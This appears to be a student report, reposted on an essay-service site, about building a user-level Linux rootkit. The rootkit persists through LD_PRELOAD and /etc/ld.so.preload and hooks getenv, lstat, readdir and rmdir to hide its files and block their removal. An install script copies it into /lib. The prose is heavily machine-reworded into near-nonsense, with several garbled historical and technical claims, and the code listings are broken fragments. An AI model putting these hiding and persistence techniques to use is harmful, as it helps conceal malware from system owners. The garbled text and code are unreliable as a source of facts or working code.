User Level Rootkit: Computer Security Systems

  • Hamid Tarmazdi
  • Sohaib Irshad

1 Introduction

Let us have a look at this is of the word. The term has two components, main and kit. Root is generally a UNIX/Linux term that is employed for administrators just like we do in Home windows. The word equipment is employed to denote the programs that allow you to definitely gain illegal usage of root/admin degree of the computer by executing some programs in the equipment. All of this is done without the consent or understanding of the end-user.

This file is the ultimate report on an individual level rootkit developed by our team. It contains new and up to date information from prior documents. The general aspects are discussed to give a overview on rootkits on the whole and specifically end user level rootkits. Cool features have been identified with code snippets or pseudocode depending on intricacy and amount of the code. The aim has been to make this document as home sufficient as is possible, so the reader can gain home elevators rootkits and individual level rootkits and then proceed to details of applying one.

2 Usage

There are two primary functions for rootkit.

  • Backdoor remote demand or control of the computer
  • Software eavesdropping.

Rootkits are used to administratively control your personal computer, either through respectable means or elsewhere. Which means that one can perform files, gain access to logs, monitor an individual activity and even able to change the computer settings. If we consider the stringent meaning of rootkit, even some versions of VNC are rootkits.

One example of the rootkit use was by Sony BMG's attempt to install a software on customer machines to avoid copyright violations.

3 Propagation

Rootkits do not propagate independently. They are a unitary part of three part part which we call as Blended Risk. A blended hazard has three snippets of code that are dropper, loader and rootkit itself.

Dropper initializes the installation of the rootkit. Dropper is usually triggered through human intervention (read: error) for example clicking on a malicious website link. After it initiates, it executes loader program and then deletes itself to avoid any detection. Following the loader has been turned on, it causes a buffer overflow which then lots the rootkit in to the memory. One of the recent types of such an strike are through propagation of malicious links through communal press sites (Facebook and Twitter). After hitting a malicious website link, the rootkit takes control of the client and then directs out emails to every contact on the list. Other example is through Wealthy content such as PDF data. Just opening such files will perform dropper code and the rootkit is consequently installed, infecting the computer.

4 Types of Rootkits

There are several types of rootkits that people can discuss.

4. 1 User-mode rootkits

Such rootkits usually operate on your personal computer with administrative privileges. This allows the usermode rootkits to change security options and hide system processes, files, system motorists, block network plug-ins and system services. These rootkits remain on the infected computer through copying of required data on target computer's hard drive and release automatically with every system reboot.

4. 2 Kernel-mode rootkits

Because the user-mode rootkits are available by rootkit recognition software's operating in kernel method, malware designers developed kernel function rootkits. They placed the rootkit in the same level as operating system and rootkit detection software. In other words, the Operating system could not find the rootkit.

4. 3 User-mode/kernel-mode cross types rootkit

Some malware creators designed the cross types of both rootkits, user-mode for higher steadiness and kernel method for better stealth ability. It's the most successful and most popular rootkit at this moment.

4. 4 Firmware rootkit

The next superior form of rootkit is firmware rootkit. It is a very complicated and harder to identify rootkit. It hides itself in to the firmware of the computer and reinstall each time the Computer gets rebooted. It can be installed with any firmware such as microprocessor code to PCI enlargement credit card firmware.

4. 5 Virtual rootkit

These will be the most new kind of rootkit on the market and the most difficult to identify. It acts just like a software implementation of an hardware set in a manner very much like employed by VMware. Such rootkits are almost unseen. One of the types of such rootkits is Blue Pill.

5 Polymorphism and Detection of Rootkits

Polymorphism is one of the techniques which make us difficult to acquire and remove malwares such as rootkits. It is defined as the power by the rootkit to rewrite the center assembly code which makes antivirus pr antispyware signature based defenses unproductive.

6 History

The term rootkit or root kit at first is attributed to maliciously modified group of admin- istrative tools in a Unix OS that is granted a "root" access. If an intruder substitutes the standard administrative tools on something with a program such as rootkit, the intruder could gain root access over the system whilst at the same time obscuring these activities from the legitimate system administrator. These rootkits known as first technology rootkits were easy to detect using the various tools such as Tripwire. First recorded computer virus was learned in 1986. It used cloaking techniques to hide itself. THE MIND pathogen intercepted many attempts to learn the shoe sector and then ensured these attacks are redirected to anywhere else on the disk. These disks contained confidential data in addition to a copy of the initial boot sector. As time passes, DOS-virus cloaking methods have become more sophisti- cated, with the utilization of advanced techniques including the hooking of low-level drive INT 13H BIOS interrupt phone calls to cover unauthorized adjustments to data.

7 Features

This section has information on standard functionalities of the rootkit developed by we. Feature collection is divided into small tasks and these responsibilities are individually completed and included.

7. 1 Achieved functionality

Following is an in depth break down of the feature place including implementation details.

  1. The rootkit will be installed through changing LD PRELOAD to pre-load our energetic library with our functions to displace their original counterparts in standard C library.
  2. The rootkit shall conceal LD PRELOAD environment variable.
  3. The rootkit shall start automatically on user login.
  4. The system of the rootkit must be covered.

7. 2 Subtasks

7. 2. 1 req. 1

To achieve req. 1 we've finished following sub jobs
  1. A sample C program making a call to a way from standard C collection.
  2. A sample active library which redefines the function called in our program.
  3. Modifying LD PRELOAD to preload our custom collection.
  4. Update the customized function to also run the original function in addition to the revised code to avoid breaking efficiency.

Acceptance criteria req. 1: After successfully executing sub-task #4 operating the program created in sub-task #1 would cause execution of the altered function inside our catalogue created in sub-task #2 in addition to running the initial function from standard C libraries. This gives the capability to spy on consumer program, alter its insight/output, etc. Attaining req. 1 allows us to run our code in a consumer program.

7. 2. 2 req. 2

Following subtasks are done for req. 2.

  1. Identify the functions used to retrieve LD PRELOAD by programs
  2. Hook the functions to cover LD PRELOAD

Acceptance conditions req. 2: The function to come back environment parameters is "getenv", when hooked it will not return the worthiness for LD PRELOAD.

7. 2. 3 req. 3

To achieve req. 3 next tasks have been perused
  1. Create a script for initiating the rootkit. We've created a pseudocode for our script which places our preload catalogue into "/lib".
  2. Modify /etc/ld. so. preload to include an entrance for hooking the energetic library we've positioned in "/lib".

Acceptance standards req. 3: A script which efficiently copies the collection and applies the changes to preload when performed.

7. 2. 4 req. 4

To conceal the rootkit, the rootkit record and admittance must be covered. For greater detail on hiding please make reference to Section 9.

  1. Identify the functions involved in listing documents: The functions are recognized in Listing 6.
  2. Hook these functions to hide our system. Modified version of 6 out of 8 functions are coded.

Acceptance criteria req. 4: To be able to hide the rootkit, the folder formulated with the rootkit or the rootkit data files and any script must be covered in addition to covering LD PRELOAD(req. 2). The files and folder of the rootkit shall not be apparent.

8 Implementation

Following we have details on execution of the various features.

8. 1 req. 1

Sub-task 1

Following C program is utilized as an example program to demonstrate the device.

Listing 1: Test C Program



printf("That is a valid program. ");

Sub-task 2

We have used printf function as an example for demonstration of the feature, changed version is compiled into a distributed dynamic library using the next commands: gcc -fPIC -c -o fakeprintf. o fakeprintf. c

gcc -shared -o libfakeprintf. so fakeprintf. o

Argument -fPIC is ideal for position unbiased code to used in strong linking.

Listing 2: fakeprintf. c

#define GNU SOURCE #include

int printf(const char format, . . . )

Sub-task 3

To improve LD PRELOAD we can run the following command word: export LD PRELOAD=$PWD/libfakeprintf. so

Now when we run our test C program you will see no output as the printf function in the altered library will get executed instead of the original printf.

Sub-task 4

To run the original function as well as the modified function, we need to get yourself a pointer to the original function using "dlsym" [2] with the discussion RTLD NEXT. Code in List 3 shows how "rmdir" has been connected to avoid from removing the rootkit documents while keeping the efficiency of the said function intact everywhere you go else.

Listing 3: fakermdir. c

#define GNU SOURCE #include

int rmdir(const char pathname)

typeof(rmdir) clean rmdir;

clean rmdir = dlsym(RTLD NEXT, "rmdir"); /*

return if pathname contains rootkit files */

return clean rmdir(pathname);

8. 2 req. 2

Sub-task 1
The function to get environment variables is "getenv" [1]. Sub-task 2

The changed version in Listing 4 prevents from retrieving LD PRELOAD. However this method is not successful in hiding the environment varying.

Listing 4: fakegetenv. c

#define GNU SOURCE #include

char getenv(const char name)

typeof(getenv) clean getenv;

clean getenv = dlsym(RTLD NEXT, "getenv"); /*

return zero if name has LD_PRELOAD */

return clean getenv(name);

8. 3 req. 3

The script to set up the rootkit employs the pseudocode 5.

Listing 5: install. sh

compile and duplicate rootkit. to /lib remove source

modify /etc/ld. so. preload to hook rootkit. so export LD\ PRELOAD=\$PWD/rootkit. so

8. 4 req. 4

Sub-task 1

List of functions that need to be hooked are in List 6. Greater detail on concealing is provided

in Section 9.

Listing 6: functions

stat, fstat, lstat

Information about a file, Filter the rootkit files rmdir

Prevent removal opendir, fdopendir

Filter the rootkit directory readdir, readdir r

Prevent reading the rootkit directory

Sub-task 2

We have coded the hooked functions for stat, fstat, lstat, rmdir, readdir, readdir r. Greater detail on how to cover up the rootkit by hooking this functions in next section.

9 Hiding

Due to their importance the hiding techniques are discussed in more detail in this section. To hide the documents/folders the functions which are being used to gain access to or get home elevators these must be hooked. To have a bash which does not show the rootkit documents the LD PRELOAD for working the bash need to be hooked

LD PRELOAD=/lib/libselinux. so bash -l

The set of functions to be hooked for this function is shown in Listing 6, the method on hiding the file/folder is comparable so one example is given in Listing 7. All the functions in List 6 must be hooked based on the example in List 7.

Listing 7: Hiding the rootkit

#define GNU SOURCE #include

int lstat(const char document, struct stat buffer)

if(to be hidden(file))

errno = ENOENT; come back 1;

return clean lstat(data file, buffer);

The function "to be covered" results true for each and every of the files(example:rootkit. so or ld. so. preload) or folders including data files related to the rootkit. Applying this connect to functions in Listing 6 may cause them to skip any data file related to the rootkit.


[1] Linux man site - getenv. http://linux. perish. net/man/3/getenv [2] Linux man page - dlsym. http://linux. die. net/man/3/dlsym

Also We Can Offer!

Other services that we offer

If you don’t see the necessary subject, paper type, or topic in our list of available services and examples, don’t worry! We have a number of other academic disciplines to suit the needs of anyone who visits this website looking for help.

How to ...

We made your life easier with putting together a big number of articles and guidelines on how to plan and write different types of assignments (Essay, Research Paper, Dissertation etc)